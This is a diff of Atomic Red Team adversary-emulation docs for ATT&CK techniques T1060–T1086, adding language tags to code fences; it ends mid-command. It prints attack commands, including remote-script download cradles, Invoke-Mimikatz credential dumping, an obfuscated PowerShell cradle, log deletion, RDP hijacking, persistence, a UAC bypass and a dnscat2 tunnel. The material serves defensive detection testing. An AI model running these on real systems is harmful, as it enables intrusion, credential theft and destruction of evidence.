+59,14 @@ Run Key Persistence #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" ``` #### Cleanup Commands: -``` +```cmd REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f ``` @@ -88,12 +90,14 @@ RunOnce Key Persistence #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" ``` #### Cleanup Commands: -``` +```cmd REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f ``` @@ -118,13 +122,15 @@ RunOnce Key Persistence via PowerShell #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $RunOnceKey = "#{reg_key_path}" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1062/T1062.md b/atomics/T1062/T1062.md index ef9a0f27..6ee04f84 100644 --- a/atomics/T1062/T1062.md +++ b/atomics/T1062/T1062.md @@ -26,7 +26,9 @@ Create a New-VM #### Attack Commands: Run with `powershell`! -``` + + +```powershell Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md index 10f0168a..cdb43c9c 100644 --- a/atomics/T1063/T1063.md +++ b/atomics/T1063/T1063.md @@ -34,7 +34,9 @@ Methods to identify Security Software on an endpoint #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd netsh.exe advfirewall firewall show all profiles tasklist.exe tasklist.exe | findstr /i virus @@ -59,7 +61,9 @@ Methods to identify Security Software on an endpoint #### Attack Commands: Run with `powershell`! -``` + + +```powershell get-process | ?{$_.Description -like "*virus*"} get-process | ?{$_.Description -like "*carbonblack*"} get-process | ?{$_.Description -like "*defender*"} @@ -82,7 +86,9 @@ Methods to identify Security Software on an endpoint #### Attack Commands: Run with `sh`! -``` + + +```sh ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService ``` @@ -103,7 +109,9 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd fltmc.exe | findstr.exe 385201 ``` @@ -123,7 +131,9 @@ Discovery of installed antivirus products via a WMI query. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List ``` diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md index 404857a3..346e6fa4 100644 --- a/atomics/T1064/T1064.md +++ b/atomics/T1064/T1064.md @@ -23,7 +23,9 @@ Creates and executes a simple bash script. #### Attack Commands: Run with `sh`! -``` + + +```sh sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" chmod +x /tmp/art.sh @@ -52,13 +54,15 @@ Creates and executes a simple batch script. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create} C:\Windows\system32\cmd.exe /Q /c #{script_to_create} ``` #### Cleanup Commands: -``` +```cmd del #{script_to_create} >nul 2>&1 ``` diff --git a/atomics/T1065/T1065.md b/atomics/T1065/T1065.md index 3ce7ebb0..68106002 100644 --- a/atomics/T1065/T1065.md +++ b/atomics/T1065/T1065.md @@ -25,7 +25,9 @@ Testing uncommonly used port utilizing PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell test-netconnection -ComputerName #{domain} -port #{port} ``` @@ -51,7 +53,9 @@ Testing uncommonly used port utilizing telnet. #### Attack Commands: Run with `sh`! -``` + + +```sh telnet #{domain} #{port} ``` diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md index 4c136186..64c077d8 100644 --- a/atomics/T1069/T1069.md +++ b/atomics/T1069/T1069.md @@ -41,7 +41,9 @@ Permission Groups Discovery #### Attack Commands: Run with `sh`! -``` + + +```sh dscacheutil -q group dscl . -list /Groups groups @@ -63,7 +65,9 @@ Basic Permission Groups Discovery for Windows #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net localgroup net group /domain net group "domain admins" /domain @@ -90,7 +94,9 @@ Permission Groups Discovery utilizing PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell get-localgroup get-ADPrincipalGroupMembership #{user} | select name ``` @@ -111,7 +117,9 @@ Runs "net group" command including command aliases and loose typing to simulate #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net group /domai "Domain Admins" net groups "Account Operators" /doma net groups "Exchange Organization Management" /doma diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 586a0fdf..635b301d 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -50,7 +50,9 @@ Clear Windows Event Logs #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wevtutil cl #{log_name} ``` @@ -70,7 +72,9 @@ Manages the update sequence number (USN) change journal, which provides a persis #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd fsutil usn deletejournal /D C: ``` @@ -90,7 +94,9 @@ Delete system and audit logs #### Attack Commands: Run with `sh`! -``` + + +```sh rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ``` @@ -116,7 +122,9 @@ This test overwrites the Linux mail spool of a specified user. This technique wa #### Attack Commands: Run with `bash`! -``` + + +```bash echo 0> /var/spool/mail/#{username} ``` @@ -141,7 +149,9 @@ This test overwrites the specified log. This technique was used by threat actor #### Attack Commands: Run with `bash`! -``` + + +```bash echo 0> #{log_path} ``` @@ -161,14 +171,16 @@ Recommended Detection: Monitor for use of the windows event log filepath in Powe #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId Stop-Process -Id $eventLogId -Force Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx ``` #### Cleanup Commands: -``` +```powershell Start-Service -Name EventLog ``` @@ -187,7 +199,9 @@ Clear event logs using built-in PowerShell commands #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Clear-EventLog -logname Application ``` diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index f0f67bbe..17fb6d17 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -39,7 +39,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m #### Attack Commands: Run with `powershell`! -``` + + +```powershell Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null @@ -68,7 +70,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd curl -s -A "HttpBrowser/1.0" -m3 #{domain} curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} @@ -97,7 +101,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m #### Attack Commands: Run with `sh`! -``` + + +```sh curl -s -A "HttpBrowser/1.0" -m3 #{domain} curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} @@ -129,7 +135,9 @@ The intent of this test is to trigger threshold based detection on the number of #### Attack Commands: Run with `powershell`! -``` + + +```powershell for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} ``` @@ -160,7 +168,9 @@ This behaviour is typical of implants either in an idle state waiting for instru #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} ``` @@ -189,7 +199,9 @@ The simulation involves sending DNS queries that gradually increase in length un #### Attack Commands: Run with `powershell`! -``` + + +```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} ``` @@ -219,7 +231,9 @@ https://github.com/lukebaggett/dnscat2-powershell #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} ``` @@ -246,13 +260,15 @@ Uses cscript //E:jscript to download a file #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} cscript //E:Jscript #{script_file} ``` #### Cleanup Commands: -``` +```cmd del #{script_file} /F /Q >nul 2>&1 ``` diff --git a/atomics/T1073/T1073.md b/atomics/T1073/T1073.md index df89b15a..94a222b8 100644 --- a/atomics/T1073/T1073.md +++ b/atomics/T1073/T1073.md @@ -24,12 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd $PathToAtomicsFolder\T1073\bin\GUP.exe ``` #### Cleanup Commands: -``` +```cmd taskkill /F /IM #{process_name} ``` diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index b13ab751..9fcdeb6e 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -23,7 +23,9 @@ Utilize powershell to download discovery.bat and save to a local file #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log ``` @@ -43,7 +45,9 @@ Utilize curl to download discovery.sh and execute a basic information gathering #### Attack Commands: Run with `bash`! -``` + + +```bash curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log ``` @@ -63,12 +67,14 @@ Use living off the land tools to zip a file and stage it in the Windows temporar #### Attack Commands: Run with `powershell`! -``` + + +```powershell Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip ``` #### Cleanup Commands: -``` +```powershell Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore ``` diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md index 9fbccb58..66961cde 100644 --- a/atomics/T1075/T1075.md +++ b/atomics/T1075/T1075.md @@ -29,7 +29,9 @@ Note: must dump hashes first #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} ``` @@ -58,20 +60,23 @@ command execute with crackmapexec #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ``` + #### Dependencies: Run with `powershell`! ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) ##### Check Prereq Commands: -``` +```powershell if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} ``` diff --git a/atomics/T1076/T1076.md b/atomics/T1076/T1076.md index c6461ff1..408cacc5 100644 --- a/atomics/T1076/T1076.md +++ b/atomics/T1076/T1076.md @@ -23,14 +23,16 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" net start sesshijack ``` #### Cleanup Commands: -``` +```cmd sc.exe delete sesshijack ``` @@ -55,20 +57,23 @@ Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonser #### Attack Commands: Run with `powershell`! -``` + + +```powershell Connect-RDP -ComputerName #{logonserver} -User #{username} ``` + #### Dependencies: Run with `powershell`! ##### Description: Computer must be domain joined ##### Check Prereq Commands: -``` +```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Joining this computer to a domain must be done manually ``` diff --git a/atomics/T1077/T1077.md b/atomics/T1077/T1077.md index 86a613fd..16c1f3f0 100644 --- a/atomics/T1077/T1077.md +++ b/atomics/T1077/T1077.md @@ -35,7 +35,9 @@ Connecting To Remote Shares #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" ``` @@ -62,7 +64,9 @@ Map Admin share utilizing PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} ``` @@ -88,7 +92,9 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd psexec.exe #{remote_host} -c #{command_path} ``` @@ -115,7 +121,9 @@ This technique is used by post-exploitation frameworks. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 ``` diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md index 1b853732..444ccf72 100644 --- a/atomics/T1081/T1081.md +++ b/atomics/T1081/T1081.md @@ -29,7 +29,9 @@ In cloud environments, authenticated user credentials are often stored in local #### Attack Commands: Run with `sh`! -``` + + +```sh python2 laZagne.py all ``` @@ -54,7 +56,9 @@ Extracting credentials from files #### Attack Commands: Run with `sh`! -``` + + +```sh grep -ri password #{file_path} ``` @@ -74,7 +78,9 @@ Extracting Credentials from Files #### Attack Commands: Run with `powershell`! -``` + + +```powershell findstr /si pass *.xml *.doc *.txt *.xls ls -R | select-string -Pattern password ``` @@ -95,7 +101,9 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd type C:\Windows\Panther\unattend.xml > nul 2>&1 type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 ``` diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index c2a9ed3b..4a1f0c99 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -51,7 +51,9 @@ Identify System Info #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ``` @@ -72,7 +74,9 @@ Identify System Info #### Attack Commands: Run with `sh`! -``` + + +```sh systemsetup system_profiler ls -al /Applications @@ -94,7 +98,9 @@ Identify System Info #### Attack Commands: Run with `sh`! -``` + + +```sh uname -a >> /tmp/loot.txt cat /etc/lsb-release >> /tmp/loot.txt cat /etc/redhat-release >> /tmp/loot.txt @@ -118,7 +124,9 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot #### Attack Commands: Run with `bash`! -``` + + +```bash cat /sys/class/dmi/id/bios_version | grep -i amazon cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU" @@ -145,7 +153,9 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup #### Attack Commands: Run with `bash`! -``` + + +```bash sudo lsmod | grep -i "vboxsf\|vboxguest" sudo lsmod | grep -i "vmw_baloon\|vmxnet" sudo lsmod | grep -i "xen-vbd\|xen-vnif" @@ -169,7 +179,9 @@ Identify system hostname for Windows. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd hostname ``` @@ -189,7 +201,9 @@ Identify system hostname for Linux and macOS systems. #### Attack Commands: Run with `bash`! -``` + + +```bash hostname ``` @@ -209,7 +223,9 @@ Identify the Windows MachineGUID value for a system. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid ``` diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 6eb54bb9..5af55518 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -31,7 +31,9 @@ Find or discover files on the file system #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download @@ -58,7 +60,9 @@ Find or discover files on the file system #### Attack Commands: Run with `powershell`! -``` + + +```powershell ls -recurse get-childitem -recurse gci -recurse @@ -86,7 +90,9 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ #### Attack Commands: Run with `sh`! -``` + + +```sh ls -a > allcontents.txt ls -la /Library/Preferences/ > detailedprefsinfo.txt file */* *>> ../files.txt @@ -112,7 +118,9 @@ Find or discover files on the file system #### Attack Commands: Run with `sh`! -``` + + +```sh cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt cat /etc/mtab > /tmp/loot.txt find . -type f -iname *.pdf > /tmp/loot.txt diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md index 67610802..999c4ee5 100644 --- a/atomics/T1084/T1084.md +++ b/atomics/T1084/T1084.md @@ -25,7 +25,9 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; @@ -44,7 +46,7 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa ``` #### Cleanup Commands: -``` +```powershell $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md index 4a6edd99..1ac74071 100644 --- a/atomics/T1085/T1085.md +++ b/atomics/T1085/T1085.md @@ -36,7 +36,9 @@ Test execution of a remote script using rundll32.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` @@ -63,7 +65,9 @@ Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) ``` @@ -90,20 +94,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` @@ -129,20 +136,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` @@ -168,20 +178,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` @@ -207,20 +220,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} ``` + #### Dependencies: Run with `powershell`! ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md index c019c31f..6c8e2c09 100644 --- a/atomics/T1086/T1086.md +++ b/atomics/T1086/T1086.md @@ -56,7 +56,9 @@ Download Mimikatz and dump credentials #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" ``` @@ -81,7 +83,9 @@ Download Bloodhound and run it #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound" ``` @@ -102,7 +106,9 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR #### Attack Commands: Run with `powershell`! -``` + + +```powershell (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) @@ -124,7 +130,9 @@ Run mimikatz via PsSendKeys #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr ``` @@ -145,7 +153,9 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" ``` @@ -173,7 +183,9 @@ Using PS 5.1, add a user via CLI #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}' ``` @@ -200,7 +212,9 @@ Not proxy aware removing cache although does not appear to write to those locati #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` @@ -227,7 +241,9 @@ Not proxy aware removing cache although does not appear to write to those locati #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` @@ -253,7 +269,9 @@ Powershell xml download request #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" ``` @@ -279,7 +297,9 @@ Powershell invoke mshta to download payload #### Attack Commands: Run with `powershell`! -``` + + +```powershell "C:\Windows\system32\cmd.exe" /c "mshta.exe 